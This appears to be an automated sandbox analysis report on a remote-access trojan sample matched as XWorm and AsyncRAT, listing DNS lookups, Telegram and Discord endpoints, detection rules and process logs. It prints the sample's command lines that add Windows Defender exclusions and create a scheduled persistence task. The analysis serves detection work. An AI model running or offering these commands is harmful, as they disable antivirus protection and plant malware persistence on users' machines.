                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002A66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002A66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                    Source: global trafficDNS traffic detected: DNS query: 122295cm.n9shteam.in
                                    Source: powershell.exe, 0000000E.00000002.1699293862.0000025F293F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                                    Source: powershell.exe, 00000008.00000002.1382080691.00000291C4810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m)1
                                    Source: powershell.exe, 0000000B.00000002.1510501771.000001A7EB190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                    Source: powershell.exe, 0000000B.00000002.1510501771.000001A7EB190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                                    Source: powershell.exe, 0000000E.00000002.1694832376.0000025F2917E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                                    Source: svchost.exe, 0000001C.00000002.2731978464.0000027FE9000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                    Source: qmgr.db.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                    Source: qmgr.db.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                    Source: qmgr.db.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                    Source: qmgr.db.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                    Source: qmgr.db.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                    Source: qmgr.db.28.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                    Source: edb.log.28.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                    Source: HaLCYOFjMN.exeString found in binary or memory: http://ip-api.com/line/?fields=hosting
                                    Source: powershell.exe, 00000008.00000002.1374360304.00000291BC071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1480589224.000001A790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1671013301.0000025F20E5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: powershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000008.00000002.1358832302.00000291AC229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1409156363.000001A780229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1556214929.0000025F11018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: HaLCYOFjMN.exe, 00000005.00000002.2734936969.0000000002561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1358832302.00000291AC001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1409156363.000001A780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1556214929.0000025F10DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1737986388.0000018880001000.00000004.00000800.00020000.00000000.sdmp, portBrowserweb.exe, 00000021.00000002.2565641894.0000000003024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000008.00000002.1358832302.00000291AC229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1409156363.000001A780229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1556214929.0000025F11018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 0000000E.00000002.1698122440.0000025F29337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                                    Source: powershell.exe, 00000008.00000002.1358832302.00000291AC001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1409156363.000001A780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1556214929.0000025F10DF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1737986388.0000018880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.s
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                                    Source: HaLCYOFjMN.exeString found in binary or memory: https://api.telegram.org/bot
                                    Source: powershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                                    Source: edb.log.28.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                                    Source: svchost.exe, 0000001C.00000003.2101646208.0000027FE8E20000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                                    Source: powershell.exe, 00000010.00000002.1737986388.0000018880229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: powershell.exe, 00000008.00000002.1374360304.00000291BC071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1480589224.000001A790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1671013301.0000025F20E5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1872814748.000001889006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                    Source: qmgr.db.28.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49975 version: TLS 1.2

                                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                                    barindex
                                    Contains functionality to capture screen (.Net source)
                                    Source: 5.2.HaLCYOFjMN.exe.7f0000.0.raw.unpack, RemoteDesktop.cs.Net Code: GetScreen
                                    Source: cnvwov.EXE, 00000019.00000002.2108078019.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_e2258485-b

                                    Spam, unwanted Advertisements and Ransom Demands

                                    barindex
                                    Reads the System eventlog
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                                    Operating System Destruction

                                    barindex
                                    Protects its processes via BreakOnTermination flag
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: 01 00 00 00 Jump to behavior

                                    System Summary

                                    barindex
                                    Malicious sample detected (through community Yara rule)
                                    Source: HaLCYOFjMN.exe, type: SAMPLEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                                    Source: HaLCYOFjMN.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                                    Source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                    .NET source code contains very large array initializations
                                    Source: cnvwov.EXE.5.dr, Strings.csLarge array initialization: Strings: array initializer size 6160
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C66FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,24_2_00C66FAA
                                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\6ccacd8608530f
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC13E65C595E5748469989E9DEA0292D89.TMP
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeCode function: 5_2_00007FFAAC4720D15_2_00007FFAAC4720D1
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeCode function: 5_2_00007FFAAC475E065_2_00007FFAAC475E06
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeCode function: 5_2_00007FFAAC476BB25_2_00007FFAAC476BB2
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeCode function: 5_2_00007FFAAC47BAF85_2_00007FFAAC47BAF8
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeCode function: 5_2_00007FFAAC4809E15_2_00007FFAAC4809E1
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeCode function: 5_2_00007FFAAC471E4E5_2_00007FFAAC471E4E
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeCode function: 5_2_00007FFAAC4833D15_2_00007FFAAC4833D1
                                    Source: C:\Users\user\AppData\Roaming\Update.exeCode function: 22_2_00007FFAAC480EAE22_2_00007FFAAC480EAE
                                    Source: C:\Users\user\AppData\Roaming\Update.exeCode function: 22_2_00007FFAAC4810FA22_2_00007FFAAC4810FA
                                    Source: C:\Users\user\AppData\Roaming\Update.exeCode function: 22_2_00007FFAAC481E4E22_2_00007FFAAC481E4E
                                    Source: C:\Users\user\AppData\Roaming\Update.exeCode function: 23_2_00007FFAAC480EAE23_2_00007FFAAC480EAE
                                    Source: C:\Users\user\AppData\Roaming\Update.exeCode function: 23_2_00007FFAAC4810FA23_2_00007FFAAC4810FA
                                    Source: C:\Users\user\AppData\Roaming\Update.exeCode function: 23_2_00007FFAAC481E4E23_2_00007FFAAC481E4E
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C6848E24_2_00C6848E
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C640FE24_2_00C640FE
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7408824_2_00C74088
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C700B724_2_00C700B7
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C851C924_2_00C851C9
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7715324_2_00C77153
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C762CA24_2_00C762CA
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C632F724_2_00C632F7
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C743BF24_2_00C743BF
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C8D44024_2_00C8D440
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C6F46124_2_00C6F461
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C6C42624_2_00C6C426
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C777EF24_2_00C777EF
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C8D8EE24_2_00C8D8EE
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C6286B24_2_00C6286B
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C919F424_2_00C919F4
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C6E9B724_2_00C6E9B7
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C76CDC24_2_00C76CDC
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C73E0B24_2_00C73E0B
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C6EFE224_2_00C6EFE2
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C84F9A24_2_00C84F9A
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXECode function: 25_2_00007FFAAC488F9B25_2_00007FFAAC488F9B
                                    Source: C:\Users\user\AppData\Roaming\Update.exeCode function: 29_2_00007FFAAC4610FA29_2_00007FFAAC4610FA
                                    Source: C:\Users\user\AppData\Roaming\Update.exeCode function: 29_2_00007FFAAC461E4E29_2_00007FFAAC461E4E
                                    Source: C:\Users\user\AppData\Roaming\Update.exeCode function: 30_2_00007FFAAC4710FA30_2_00007FFAAC4710FA
                                    Source: C:\Users\user\AppData\Roaming\Update.exeCode function: 30_2_00007FFAAC471E4E30_2_00007FFAAC471E4E
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeCode function: 33_2_00007FFAAC480D4833_2_00007FFAAC480D48
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeCode function: 33_2_00007FFAAC480E4333_2_00007FFAAC480E43
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeCode function: 33_2_00007FFAAC86010F33_2_00007FFAAC86010F
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEProcess token adjusted: Security
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: String function: 00C7F5F0 appears 31 times
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: String function: 00C7EB78 appears 39 times
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: String function: 00C7EC50 appears 56 times
                                    Source: HaLCYOFjMN.exe, 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameupdate.exe4 vs HaLCYOFjMN.exe
                                    Source: HaLCYOFjMN.exe, 00000005.00000002.2732554240.00000000007F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRemoteDesktop.dll< vs HaLCYOFjMN.exe
                                    Source: HaLCYOFjMN.exeBinary or memory string: OriginalFilenameupdate.exe4 vs HaLCYOFjMN.exe
                                    Source: HaLCYOFjMN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: HaLCYOFjMN.exe, type: SAMPLEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                                    Source: HaLCYOFjMN.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                                    Source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                                    Source: HaLCYOFjMN.exe, XNIJZHKIRB1ZVtDdGV.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: HaLCYOFjMN.exe, XNIJZHKIRB1ZVtDdGV.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: HaLCYOFjMN.exe, KoYQeD3DHuuDcMrQ12.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: cnvwov.EXE.5.dr, PBE.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: cnvwov.EXE.5.dr, Strings.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 5.2.HaLCYOFjMN.exe.7f0000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: 5.2.HaLCYOFjMN.exe.7f0000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                                    Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@81/76@3/4
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C66C74 GetLastError,FormatMessageW,24_2_00C66C74
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,24_2_00C7A6C2
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeFile created: C:\Program Files (x86)\mozilla maintenance service\logs\ybWXCCKXKhIvlNpBF.exe
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile created: C:\Users\user\AppData\Roaming\Update.exeJump to behavior
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6800:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-ue3JZ8LnyDYDzLQZpNKo
                                    Source: C:\Program Files\Windows Mail\System.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2020:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1268:120:WilError_03
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeMutant created: \Sessions\1\BaseNamedObjects\V2LiHkO7nVx8rIGb
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\agentwebreviewDhcp\fSi1yDkwZTtB7t90YnI.bat" "
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCommand line argument: sfxname24_2_00C7DF1E
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCommand line argument: sfxstime24_2_00C7DF1E
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCommand line argument: STARTDLG24_2_00C7DF1E
                                    Source: HaLCYOFjMN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: HaLCYOFjMN.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: HaLCYOFjMN.exeReversingLabs: Detection: 78%
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeFile read: C:\Users\user\Desktop\HaLCYOFjMN.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\HaLCYOFjMN.exe "C:\Users\user\Desktop\HaLCYOFjMN.exe"
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HaLCYOFjMN.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'HaLCYOFjMN.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Update.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe"
                                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Update.exe C:\Users\user\AppData\Roaming\Update.exe
                                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Update.exe "C:\Users\user\AppData\Roaming\Update.exe"
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Users\user\AppData\Local\Temp\rqbprm.exe "C:\Users\user\AppData\Local\Temp\rqbprm.exe"
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Users\user\AppData\Local\Temp\cnvwov.EXE "C:\Users\user\AppData\Local\Temp\cnvwov.EXE"
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
